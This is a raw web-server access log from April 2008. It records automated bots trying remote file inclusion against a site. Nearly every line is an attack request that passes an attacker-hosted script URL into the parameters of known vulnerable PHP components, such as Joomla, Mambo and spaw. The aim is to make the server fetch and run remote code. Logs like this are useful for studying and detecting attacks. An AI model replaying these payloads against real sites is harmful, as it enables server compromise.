80.93.62.100 - - [30/Apr/2008:12:32:11 -0700] "GET /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.168 - - [30/Apr/2008:12:32:11 -0700] "GET /logs/access_071118.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.62.100 - - [30/Apr/2008:12:32:11 -0700] "GET /logs/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.62.100 - - [30/Apr/2008:12:32:12 -0700] "GET /logs/access_071118.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.50.53.151 - - [30/Apr/2008:12:32:26 -0700] "GET /logs/access_080114.log/convert/mvcw.php?step=1&vwar_root=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.50.53.151 - - [30/Apr/2008:12:32:26 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.50.53.151 - - [30/Apr/2008:12:32:27 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.126.158.150 - - [30/Apr/2008:12:32:39 -0700] "GET /logs/access_080201.log//?php=paginahttp://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.158.150 - - [30/Apr/2008:12:32:42 -0700] "GET //?php=paginahttp://216.139.236.19/cache/arab.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.808" "www.dmulk.com"
64.32.31.33 - - [30/Apr/2008:12:32:43 -0700] "GET /logs/access.log//trans/trans.php?trans=eng&page=http://66.7.194.228/~josecond/ajax/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
75.126.158.150 - - [30/Apr/2008:12:32:43 -0700] "GET /logs//?php=paginahttp://216.139.236.19/cache/arab.txt? HTTP/1.1" 200 45416 "-" "libwww-perl/5.808" "www.dmulk.com"
64.32.31.33 - - [30/Apr/2008:12:32:43 -0700] "GET //trans/trans.php?trans=eng&page=http://66.7.194.228/~josecond/ajax/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.32.31.33 - - [30/Apr/2008:12:32:43 -0700] "GET /logs//trans/trans.php?trans=eng&page=http://66.7.194.228/~josecond/ajax/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
212.241.215.166 - - [30/Apr/2008:12:32:55 -0700] "GET /logs/access.log/view.php?sub=http://veldega-tour.ru/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.215.166 - - [30/Apr/2008:12:32:56 -0700] "GET /view.php?sub=http://veldega-tour.ru/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.215.166 - - [30/Apr/2008:12:32:57 -0700] "GET /logs/view.php?sub=http://veldega-tour.ru/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.159.45.5 - - [30/Apr/2008:12:33:09 -0700] "GET /logs/access_071129.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.159.45.5 - - [30/Apr/2008:12:33:09 -0700] "GET /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.159.45.5 - - [30/Apr/2008:12:33:09 -0700] "GET /logs/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.159.45.5 - - [30/Apr/2008:12:33:09 -0700] "GET /logs/access_071118.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
93.93.112.60 - - [30/Apr/2008:12:33:17 -0700] "GET /logs/access_071129.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
93.93.112.60 - - [30/Apr/2008:12:33:17 -0700] "GET /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
93.93.112.60 - - [30/Apr/2008:12:33:18 -0700] "GET /logs/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
93.93.112.60 - - [30/Apr/2008:12:33:18 -0700] "GET /logs/access_071118.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
203.72.181.15 - - [30/Apr/2008:12:33:27 -0700] "GET /logs/access_080304.log//newspublish/include.php?path%5Bdocroot%5D=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
137.204.107.138 - - [30/Apr/2008:12:33:30 -0700] "GET /logs/access_080131.log/convert/mvcw.php?vwar_root=http://gtacrime.nl/a/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [30/Apr/2008:12:33:30 -0700] "GET /convert/mvcw.php?vwar_root=http://gtacrime.nl/a/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [30/Apr/2008:12:33:31 -0700] "GET /logs/convert/mvcw.php?vwar_root=http://gtacrime.nl/a/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.77.9.141 - - [30/Apr/2008:12:33:43 -0700] "GET /logs/access_080214.log/news/bp_ncom.php?bnrep=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.77.9.141 - - [30/Apr/2008:12:33:44 -0700] "GET /news/bp_ncom.php?bnrep=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.77.9.141 - - [30/Apr/2008:12:33:44 -0700] "GET /logs/news/bp_ncom.php?bnrep=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.40.12.40 - - [30/Apr/2008:12:33:47 -0700] "GET /logs/access_080214.log/news/bp_ncom.php?bnrep=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.40.12.40 - - [30/Apr/2008:12:33:47 -0700] "GET /news/bp_ncom.php?bnrep=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.40.12.40 - - [30/Apr/2008:12:33:47 -0700] "GET /logs/news/bp_ncom.php?bnrep=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.106.244.146 - - [30/Apr/2008:12:33:48 -0700] "GET /logs/access_080214.log/news/bp_ncom.php?bnrep=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.106.244.146 - - [30/Apr/2008:12:33:48 -0700] "GET /news/bp_ncom.php?bnrep=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.106.244.146 - - [30/Apr/2008:12:33:49 -0700] "GET /logs/news/bp_ncom.php?bnrep=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.100.1.157 - - [30/Apr/2008:12:33:51 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://h1.ripway.com/cyber1212/plugin/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.100.1.157 - - [30/Apr/2008:12:33:52 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://h1.ripway.com/cyber1212/plugin/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.100.1.157 - - [30/Apr/2008:12:33:52 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://h1.ripway.com/cyber1212/plugin/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
193.142.215.14 - - [30/Apr/2008:12:34:11 -0700] "GET /logs/access_080214.log/news/bp_ncom.php?bnrep=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.142.215.14 - - [30/Apr/2008:12:34:11 -0700] "GET /news/bp_ncom.php?bnrep=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.142.215.14 - - [30/Apr/2008:12:34:12 -0700] "GET /logs/news/bp_ncom.php?bnrep=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.100.1.157 - - [30/Apr/2008:12:34:16 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://h1.ripway.com/cyber1212/plugin/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.155.232.37 - - [30/Apr/2008:12:34:17 -0700] "GET /logs/access_080214.log/news/bp_ncom.php?bnrep=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [30/Apr/2008:12:34:17 -0700] "GET /news/bp_ncom.php?bnrep=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [30/Apr/2008:12:34:18 -0700] "GET /logs/news/bp_ncom.php?bnrep=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.159.45.5 - - [30/Apr/2008:12:34:30 -0700] "GET /logs/access_071129.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.159.45.5 - - [30/Apr/2008:12:34:30 -0700] "GET /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.159.45.5 - - [30/Apr/2008:12:34:30 -0700] "GET /logs/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.159.45.5 - - [30/Apr/2008:12:34:30 -0700] "GET /logs/access_071118.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
218.50.53.151 - - [30/Apr/2008:12:34:31 -0700] "GET /logs/access_080127.log/convert/mvcw.php?step=1&vwar_root=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.58.179.218 - - [30/Apr/2008:12:34:32 -0700] "GET /logs/index.php?option=com_rss&feed=RSS0.91&no_html=&mosConfig_absolute_path=http://www.peccu.org/components/com_extcalendar/upload/index.php/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
207.58.179.218 - - [30/Apr/2008:12:34:35 -0700] "GET /index.php?option=com_rss&feed=RSS0.91&no_html=&mosConfig_absolute_path=http://www.peccu.org/components/com_extcalendar/upload/index.php/boo.do??? HTTP/1.1" 200 17 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
89.108.93.123 - - [30/Apr/2008:12:34:36 -0700] "GET /logs//components/com_akocomment/akocomments.php?mosConfig_absolute_path=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
89.108.93.123 - - [30/Apr/2008:12:34:36 -0700] "GET //components/com_akocomment/akocomments.php?mosConfig_absolute_path=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
213.186.117.208 - - [30/Apr/2008:12:35:24 -0700] "GET //components/com_mamblog/showblogs.php?mosConfig_absolute_path=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
124.217.243.23 - - [30/Apr/2008:12:35:31 -0700] "GET /logs/mcf.php?content=http://www.studio-wave.com/concept/images/font.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
124.217.243.23 - - [30/Apr/2008:12:35:32 -0700] "GET /mcf.php?content=http://www.studio-wave.com/concept/images/font.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.47.36.29 - - [30/Apr/2008:12:35:32 -0700] "GET /logs/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.47.36.29 - - [30/Apr/2008:12:35:33 -0700] "GET /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
200.255.103.140 - - [30/Apr/2008:12:35:33 -0700] "GET /logs/access.log//main.php?sayfa=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.127 - - [30/Apr/2008:12:35:37 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://h1.ripway.com/cyber1212/plugin/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.127 - - [30/Apr/2008:12:35:38 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://h1.ripway.com/cyber1212/plugin/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.127 - - [30/Apr/2008:12:35:38 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://h1.ripway.com/cyber1212/plugin/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.47.36.29 - - [30/Apr/2008:12:35:39 -0700] "GET /logs/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.47.36.29 - - [30/Apr/2008:12:35:39 -0700] "GET /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
222.237.76.146 - - [30/Apr/2008:12:35:39 -0700] "GET /logs/access_071116.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.237.76.146 - - [30/Apr/2008:12:35:40 -0700] "GET /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.237.76.146 - - [30/Apr/2008:12:35:40 -0700] "GET /logs/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.237.76.146 - - [30/Apr/2008:12:35:45 -0700] "GET /logs/access_071116.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.237.76.146 - - [30/Apr/2008:12:35:46 -0700] "GET /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.237.76.146 - - [30/Apr/2008:12:35:46 -0700] "GET /logs/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.255.103.140 - - [30/Apr/2008:12:35:50 -0700] "GET /logs/enc/content.php?Home_Path=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.237.76.146 - - [30/Apr/2008:12:35:54 -0700] "GET /logs/access_071116.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.237.76.146 - - [30/Apr/2008:12:35:54 -0700] "GET /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.255.103.140 - - [30/Apr/2008:12:35:54 -0700] "GET /enc/content.php?Home_Path=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.237.76.146 - - [30/Apr/2008:12:35:55 -0700] "GET /logs/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.151.23.213 - - [30/Apr/2008:12:36:00 -0700] "GET /logs/index.php?pagina=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.151.23.213 - - [30/Apr/2008:12:36:04 -0700] "GET /index.php?pagina=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
70.86.49.98 - - [30/Apr/2008:12:36:08 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
70.86.49.98 - - [30/Apr/2008:12:36:08 -0700] "GET //appserv/main.php?appserv_root=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
66.7.199.73 - - [30/Apr/2008:12:36:23 -0700] "GET /logs/access_080201.log//claroline/phpbb/page_tail.php?includePath=http://www.joomla.teafree.pl/editor/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.7.199.73 - - [30/Apr/2008:12:36:23 -0700] "GET //claroline/phpbb/page_tail.php?includePath=http://www.joomla.teafree.pl/editor/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.7.199.73 - - [30/Apr/2008:12:36:23 -0700] "GET /logs//claroline/phpbb/page_tail.php?includePath=http://www.joomla.teafree.pl/editor/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.255.103.140 - - [30/Apr/2008:12:36:31 -0700] "GET /logs/access_080220.log/homepage.php?sel=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.127 - - [30/Apr/2008:12:36:31 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://h1.ripway.com/cyber1212/plugin/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.255.103.140 - - [30/Apr/2008:12:36:35 -0700] "GET /homepage.php?sel=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.255.103.140 - - [30/Apr/2008:12:36:38 -0700] "GET /logs/homepage.php?sel=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [30/Apr/2008:12:36:40 -0700] "GET /logs/access_080127.log/convert/mvcw.php?vwar_root=http://gtacrime.nl/a/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.255.103.140 - - [30/Apr/2008:12:36:44 -0700] "GET /logs/access_080218.log//components/com_simpleboard/image_upload.php?sbp=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.93.123 - - [30/Apr/2008:12:36:45 -0700] "GET //components/com_mamblog/showblogs.php?mosConfig_absolute_path=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
64.38.22.250 - - [30/Apr/2008:12:36:46 -0700] "GET /logs/access_080214.log/news/bp_ncom.php?bnrep=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.22.250 - - [30/Apr/2008:12:36:51 -0700] "GET /news/bp_ncom.php?bnrep=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
200.255.103.140 - - [30/Apr/2008:12:37:00 -0700] "GET /logs/access_080324.log/homepage.php?sel=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.38.22.250 - - [30/Apr/2008:12:37:00 -0700] "GET /logs/news/bp_ncom.php?bnrep=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.100.1.157 - - [30/Apr/2008:12:37:08 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://h1.ripway.com/cyber1212/plugin/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.100.1.157 - - [30/Apr/2008:12:37:08 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://h1.ripway.com/cyber1212/plugin/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.100.1.157 - - [30/Apr/2008:12:37:08 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://h1.ripway.com/cyber1212/plugin/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.241.172.8 - - [30/Apr/2008:12:37:11 -0700] "GET /logs/access_080215.log//components/com_mamblog/showblogs.php?mosConfig_absolute_path=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.241.172.8 - - [30/Apr/2008:12:37:12 -0700] "GET /logs//components/com_mamblog/showblogs.php?mosConfig_absolute_path=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.72.181.15 - - [30/Apr/2008:12:37:30 -0700] "GET /logs/access_080223.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://gujewear.com/bemarket/goods/qmono/Q-MoNoR57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.255.103.140 - - [30/Apr/2008:12:37:34 -0700] "GET /logs/access_080211.log/xGB.php?act=admin&do=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.255.103.140 - - [30/Apr/2008:12:37:37 -0700] "GET /xGB.php?act=admin&do=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.32.31.33 - - [30/Apr/2008:12:37:40 -0700] "GET /logs/trans.php?trans=http://66.7.194.228/~josecond/ajax/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.32.31.33 - - [30/Apr/2008:12:37:40 -0700] "GET /trans.php?trans=http://66.7.194.228/~josecond/ajax/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.255.103.140 - - [30/Apr/2008:12:37:44 -0700] "GET /logs/xGB.php?act=admin&do=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.221.184.148 - - [30/Apr/2008:12:37:44 -0700] "GET /logs/access_080215.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.studio-wave.com/concept/images/font.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.221.184.148 - - [30/Apr/2008:12:37:44 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.studio-wave.com/concept/images/font.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.221.184.148 - - [30/Apr/2008:12:37:44 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.studio-wave.com/concept/images/font.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.254.37.143 - - [30/Apr/2008:12:37:57 -0700] "GET /logs/mcf.php?content=http://kas.casperhelix.com/phpBB3/help.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.254.37.143 - - [30/Apr/2008:12:37:57 -0700] "GET /mcf.php?content=http://kas.casperhelix.com/phpBB3/help.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
80.241.172.8 - - [30/Apr/2008:12:38:04 -0700] "GET /logs//components/com_akocomment/akocomments.php?mosConfig_absolute_path=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.241.172.8 - - [30/Apr/2008:12:38:05 -0700] "GET //components/com_akocomment/akocomments.php?mosConfig_absolute_path=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.255.103.140 - - [30/Apr/2008:12:38:15 -0700] "GET /logs/access_080228.log/xGB.php?act=admin&do=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.100.1.157 - - [30/Apr/2008:12:38:23 -0700] "GET /logs/access_080308.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://h1.ripway.com/cyber1212/plugin/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
77.79.246.70 - - [30/Apr/2008:12:38:28 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
206.221.184.148 - - [30/Apr/2008:12:38:37 -0700] "GET /logs/access.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.studio-wave.com/concept/images/font.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.77.27.142 - - [30/Apr/2008:12:39:16 -0700] "GET /logs//includes/phpmailer/class.phpmailer.php?mosConfig_absolute_path=http://buycheaperwebhosting.com/remot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.77.27.142 - - [30/Apr/2008:12:39:16 -0700] "GET //includes/phpmailer/class.phpmailer.php?mosConfig_absolute_path=http://buycheaperwebhosting.com/remot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
93.93.112.60 - - [30/Apr/2008:12:39:18 -0700] "GET /logs/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
